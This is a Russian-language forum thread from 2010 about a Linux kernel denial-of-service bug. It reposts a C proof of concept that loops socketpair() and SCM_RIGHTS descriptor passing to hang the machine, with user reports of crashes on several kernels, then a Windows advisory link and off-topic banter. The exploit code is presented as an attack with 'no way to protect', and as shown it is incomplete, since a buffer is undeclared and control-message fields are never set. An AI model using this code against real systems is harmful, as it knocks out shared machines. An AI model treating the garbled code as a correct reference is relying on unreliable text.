M7R [Off] [#] (26.11.2010 / 17:24) |
Опубликован код, приводящий к зависанию компьютера (100% загрузка всех ядер, исчерпание файловых дескрипторов).
Ссылка на код: lkml.org/lkml/2010/11/25/8
Проверял на 27, 32 — зависание воспроизводится. 32/64 бита.
Уточняю: через 1-2 секунды пролетает крашдамп (не успеваю прочитать), хост перегружается. В другом тесте система упала уже после завершения программы (примерно через 5-7 секунд).
PS Эксперты с лора говорят, что FreeBSD 8.1 тоже падает.
PPS Внезапно — на CentOS 5.5 с 2.6.18 не падает. Если запустить из-под рута, роняет, из-под пользователя — просто спокойно отрабатывает. При этом руту в соседней консоли ничего не мешает работать и система не падает.
M7R [Off] [#] (26.11.2010 / 17:25) |
Simple kernel attack using socketpair. easy, 100% reproductiblle, works under guest. no way to protect :( See source attached. Process become in state 'Running' but not killalble via kill -KILL. -- Segmentation fault #include <sys/socket.h> #include <sys/un.h> static int send_fd (int unix_fd, int fd) { struct msghdr msgh; struct cmsghdr *cmsg; msgh.msg_control = buf; cmsg = CMSG_FIRSTHDR (&msgh); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; msgh.msg_controllen = cmsg->cmsg_len; return sendmsg (unix_fd, &msgh, 0); } int main () { int fd[2], ff[2]; int target; if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1) return 1; for (;;) { if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1) return 2; send_fd (ff[0], fd[0]); send_fd (ff[0], fd[1]); close (fd[1]); close (fd[0]); fd[0] = ff[0]; fd[1] = ff[1]; } }
Seq)I(b)i( [Off] [#] (26.11.2010 / 18:19) |
* seriyPS,
* 26 ноября 2010, 01:18
Чтоб слишком обидно не было вот: Повышение привилегий в Microsoft Windows тоже свежачок от 25 ноября
http://www.securitylab.ru/vuln ... 3.php
"
гг,а то хаить счаз начнут линь.
VARG [Off] [#] (26.11.2010 / 18:22) сумашетшый псих |
а то хаить счаз начнут линь.
зы: превед
xommos [Off] [#] (26.11.2010 / 18:39) |
А мне пох у мя нортон камандр ггхортон хуярдир рулит
Борман [Off] [#] (26.11.2010 / 19:08) |
ггг кстате надыбал иешний эмулятор с прогами. типерь мой комп превратился в сегу.
Борман [Off] [#] (26.11.2010 / 19:16) |
Скачать темуНовые вверху